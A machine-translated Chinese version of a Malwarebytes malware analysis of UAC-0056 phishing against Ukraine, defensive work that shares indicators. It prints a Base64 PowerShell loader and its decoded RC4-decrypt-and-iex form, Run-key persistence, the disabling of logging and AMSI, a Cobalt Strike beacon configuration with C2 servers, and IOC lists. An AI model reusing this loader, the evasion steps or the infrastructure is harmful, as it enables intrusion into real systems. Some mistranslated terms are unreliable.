鈷再次罷工:UAC-0056 在其最新活動中繼續以烏克蘭為目標
鈷再次罷工:UAC-0056 在其最新活動中繼續以烏克蘭為目標
Malwarebytes 威脅情報團隊最近審查了一系列針對烏克蘭的網絡攻擊,我們高度相信這些攻擊歸因于 UAC-0056 (AKA UNC2589, TA471)。該威脅組織按照相同的通用策略、技術和程序 (TTP),通過網絡釣魚活動一再針對烏克蘭的政府實體。
誘餌是基于與烏克蘭正在發生的戰爭和人道主義災難有關的重要事項。我們一直在密切監視這個威脅參與者,并注意到他們基于宏的文檔以及他們的最終有效載荷發生了變化。
在本博客中,我們將連接我們和其他人(例如烏克蘭 CERT)觀察到的不同誘餌樣本之間的點。我們還將分享同一威脅參與者在 6 月底執行的先前未記錄的活動的指標。
不同的主題,相同的技巧
自從我們的博 文“房間里有一只圍棋大象”發表以來,我們已經跟蹤了幾個新樣本,如下面的時間線所示:
圖 1:不同 UAC-0056 屬性樣本之間的關系
讓我們進一步深入研究這些關系。UA-CERT 將名為“關于空缺可用性及其人員配置.xls 的信息”的文件歸因于 UAC-0056。這個文件對我們來說看起來很熟悉,這是有充分理由的,因為該宏與我們在最初的博客中分析的文檔幾乎相同:
圖 2:Vacancy 和 GoElephant dropper 宏的詳細信息
在UA-CERT (自 2022 年 2 月 24 日以來的烏克蘭人道主義災難.xls)報告的最近一次攻擊 中,我們看到了與另一個名為Help Ukraine.xls的誘餌文檔中使用的宏幾乎相同的宏 :
圖 3:幫助烏克蘭和人道主義災難宏的詳細信息
據我們所知,幫助烏克蘭的誘餌從未公開記錄過:
圖4:幫助烏克蘭7月下旬使用的誘餌
我們能夠識別出 7 個具有該主題的不同樣本,其中一個(258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0)與之前的攻擊有一些相似之處:
圖 5:不同版本之間的相似之處
此外,過去我們發現了有關名為 ExcelVBA[.]ru 的域的評論。該文檔正在聯系一個名為 excel-vba[.]ru 的可疑相似域。
圖 6:不同版本之間的相似性(2)
在受害者中,我們發現 gov.ua 電子郵件成為目標。上次競選中用作電子郵件正文的文本之一是用烏克蘭語編寫的,翻譯為:
2022 年 2 月 24 日,恐怖國家——俄羅斯聯邦的軍隊介入烏克蘭領土。為了反擊俄羅斯政府的宣傳,烏克蘭總統辦公室的國家統計局準備了一份關于烏克蘭死亡公民、無家可歸的烏克蘭公民、公民的綜合報告。烏克蘭失去工作的人數,房屋被毀的數量,因侵略行為而被摧毀的企業的數量。該報告顯示了按烏克蘭地區細分的所有數據。熟悉你自己,讓你的同事熟悉真實的事態。榮耀歸于烏克蘭!
發送給受害者的原始電子郵件的翻譯
我們將重點分析這 3 個較新的模板。確切的名稱和路徑來自024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1(關于空缺及其人員配備的信息)。該分析對其他人仍然有效,而樣本之間存在微小變化。
寫.bin
該文檔將下載一個名為write.bin的可執行文件。遵循相同方案的其他攻擊對該文件使用不同的名稱,包括Office.exe、baseupd.exe和DataSource.exe。該文件略微混淆,并執行以下操作:
建立持久性
經過一些反調試技巧后,注冊表項HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Check License用于建立持久性。HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Update Checker, 首先檢查,因為這是以前版本的惡意軟件使用的密鑰。
圖 7:用于持久性的運行鍵
放棄下一階段
下一步是將文件放到C:\ProgramData\TRYxaEbX中。這個文件以后會用到。
圖 8:IDA Pro 中顯示的 Powershell 命令行
有效負載將執行以下 powershell Base64 編碼命令:
JABBADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFQAUgBZAHgAYQBFAGIAWAAiACkAOwAKACQAQgAxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUAcwAoACIAQwBtAEEASgBuAGcAdgBkAEQAbQBpAFQAagBMAHgATgAiACkAOwAKACQAQQA9AHsAJABXACwAJABZAD0AJABBAHIAZwBzADsAJABYAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAFoAPQAoACQAWgArACQAWABbACQAXwBdACsAJABZAFsAJABfACUAJABZAC4ATABlAG4AZwB0AGgAXQApACUAMgA1ADYAOwAkAFgAWwAkAF8AXQAsACQAWABbACQAWgBdAD0AJABYAFsAJABaAF0ALAAkAFgAWwAkAF8AXQB9ADsAJABXAHwAJQB7ACQAVQA9ACgAJABVACsAMQApACUAMgA1ADYAOwAkAFYAPQAoACQAVgArACQAWABbACQAVQBdACkAJQAyADUANgA7ACQAWABbACQAVQBdACwAJABYAFsAJABWAF0APQAkAFgAWwAkAFYAXQAsACQAWABbACQAVQBdADsAJABfAC0AYgB4AG8AcgAkAFgAWwAoACQAWABbACQAVQBdACsAJABYAFsAJABWAF0AKQAlADIANQA2AF0AfQB9ADsACgAkAEMAIAA9ACAAKAAmACAAJABBACAAJABBADEAIAAkAEIAMQApADsACgAkAEUAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAEMALAAwACwAJABDAC4ATABlAG4AZwB0AGgAKQA7AAoAJABFACAAPQAgACQARQAgAC0AUwBwAGwAaQB0ACAAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQA7AAoAZgBvAHIAZQBhAGMAaAAoACQARQBFACAAaQBuACAAJABFACkAewBpAGUAeAAgACQAKAAkAEUARQArACIAOwAiACkAOwB9ADsA
圖 9:編寫可執行文件創建先前詳細的 powershell 命令
之前的塊是 Base64 編碼的;解碼為:
$A1 = [System.IO.File]::ReadAllBytes("C:\ProgramData\TRYxaEbX");
$A={$W,$Y=$Args;$X=0..255;0..255|%{$Z=($Z+$X[$_]+$Y[$_%$Y.Length])%256;$X[$_],$X[$Z]=$X[$Z],$X[$_]};$W|%{$U=($U+1)%256;$V=($V+$X[$U])%256;$X[$U],$X[$V]=$X[$V],$X[$U];$_-bxor$X[($X[$U]+$X[$V])%256]}};
$C = (& $A $A1 $B1);
$E = (New-Object -TypeName System.Text.UTF8Encoding).GetString($C,0,$C.Length);
$E = $E -Split [Environment]::NewLine;
foreach($EE in $E){iex $($EE+";");};
簡而言之,放入的文件 將使用 RC4 算法作為密鑰C:\ProgramData\TRYxaEbX進行解密 。CmAJngvdDmiTjLxN下一個 PowerShell 腳本將如下所示:
圖 10:解碼的 PowerShell 階段
在這里,我們可以看到將要采取的一些行動:
- 禁用腳本日志記錄
- 禁用模塊日志記錄
- 禁用轉錄
- 禁用 AMSI 保護
在這一步之后,另一個 Base64 有效載荷被解碼并執行:
圖 11:最終的 PowerShell 腳本
部署 Cobalt Strike 有效載荷
可以看出,第二個 PowerShell 文件提供的主要功能是注入 shellcode。這個 shellcode 可以是 32 位或 64 位,并且是一個 Cobalt Strike 信標,具有以下配置:
信標類型——HTTPS
港口 – 443
睡眠時間 – 30000
PublicKey_MD5 – defb5d95ce99e1ebbf421a1a38d9cb64
C2Server – skreatortemp.site,/s/08u1XdxChhMrLYdTasfnOMQpbsLkpq3o/field-keywords/
UserAgent – Mozilla/5.0_Frsg_stredf_o21_rutyyyrui_type (Windows NT 10.0; Win64; x64; Trident/7.0; D-M1-200309AC;D-M1-MSSP1; rv:11.0) 像 Gecko_10984gap
HttpPostUri – /nBz07hg5l3C9wuWVCGV-5xHHu1amjf76F2A8i/avp/amznussraps/
水印 – 1580103824
通過在受害者的機器上運行 Cobalt Strike 實例,它現在已完全受到威脅。
攻擊者探測沙箱
在撰寫本文時,惡意 C&C 服務器似乎已關閉。但是,在 7 月 5 日,我們看到了活躍的服務器并成功連接到我們的測試環境。攻擊者主動向機器發送偵察命令,列出幾個文件夾的內容。
我們能夠使用 Didier Steven 出色的Cobalt Strike 工具集來解碼網絡通信。
圖 12:Cobalt Strike 通信解碼
我們認為這些行動是初步行動,以檢查機器是否是可行的目標,然后再跟進其他行動。
歸因于 UAC-0056
根據 CERT UA 最近報告的攻擊,以及博客開頭指出的相似之處,我們可以高度肯定地將此攻擊歸因于 UAC-0056。
Cobalt Strike 信標中包含的簽名(水印1580103824和公鑰defb5d95ce99e1ebbf421a1a38d9cb64)可用于將攻擊連接到其他組。例如 ,根據 CobaltStrike 文檔,公鑰在部署中應該是唯一的。
但是,重要的是要注意,在這種情況下,我們不能簡單地依賴公鑰來歸因我們在本報告中分析的樣本。事實上,這些簽名被歸因于許多不同的群體。我們的評估是,該組織使用了 Cobalt Strike 的泄露版本,并且使用了與其他人相同的私鑰,這使得歸屬變得更加困難。
由于我們的反漏洞利用層,Malwarebytes 用戶可以免受此活動的影響。
國際奧委會
惡意 Excel 文檔(幫助烏克蘭模板)
fe3bc87b433e51e0713d80e379a61916ceb6007648b0fde1c44491ba44dc1cb3
c9675483ab362bc656a9f682928b6a0c3ff60a274ade3ceabac332069480605a
1b95186ecc081911c3a80f278e4ed34ee9ef3a46f5cf1ae8573ac3a4c69df532
258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0
e663bb4d9506e7c09bcf7b764d31b61d8f7dbae0b64dd4ef4e9d282e1909d386
ecd2bb648a9ad28069c1ec4c0da546507797fdf0243e9e5eece581bf702675ff
eac9a4d9b63a0ca68194eae433d6b2e9a4531b60b82faf218b8dd4b69cec09df
惡意 Excel 文檔(人道主義模板)
024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1
14736be09a7652d206cd6ab35375116ec4fad499bb1b47567e4fd56dcfcd22ea
474a0f0bb5b17a1bb024e08a0bb46277ba03392ee95766870c981658c4c2300d
有效載荷
0709a8f18c8436deea0b57deab55afbcea17657cb0186cbf0f6fcbb551661470
aadd8c7c248915c5da49c976f24aeb98ccc426fb31d1d6913519694a7bb9351a
fb2a9dcfcf41c493fb7348ff867bb3cad9962a04c9dfd5b1afa115f7ff737346
501d4741a0aa8784e9feeb9f960f259c09cbceccb206f355209c851b7f094eff
Cobalt Strike 信標和有效載荷
136.144.41[.]177
syriahr[.]eu/s/Xnk75JwUcIebkrmENtufIiiKEmoqBN/field-keywords/
syriahr[.]eu/nzXlLVas-VALvDh9lopkC/avp/amznussraps/
skreatortemp[.]site
imolaoggi[.]eu
文章轉自:alwaebytes LABS
